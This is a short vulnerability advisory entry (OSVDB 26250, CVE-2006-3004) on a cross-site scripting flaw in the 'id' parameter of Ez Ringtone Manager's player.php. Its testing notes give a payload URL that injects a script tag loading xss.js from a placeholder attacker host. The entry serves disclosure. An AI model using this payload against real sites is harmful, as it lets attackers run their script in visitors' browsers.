Ez Ringtone Manager player.php id Variable XSS

2006-06-07T06:18:59
ID OSVDB:26250
Type osvdb
Reporter luny(luny@youfucktard.com)
Modified 2006-06-07T06:18:59

Description

Manual Testing Notes

http://[target]/ringtones/player.php?action=preview&id=<SCRIPT%20SRC=http://[attacker]/xss.js></SCRIPT>&cat=LG%20Mobiles

References:

Vendor URL: http://www.scriptsez.net/ Secunia Advisory ID:20530 Related OSVDB ID: 26251 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0069.html FrSIRT Advisory: ADV-2006-2237 CVE-2006-3004 Bugtraq ID: 18340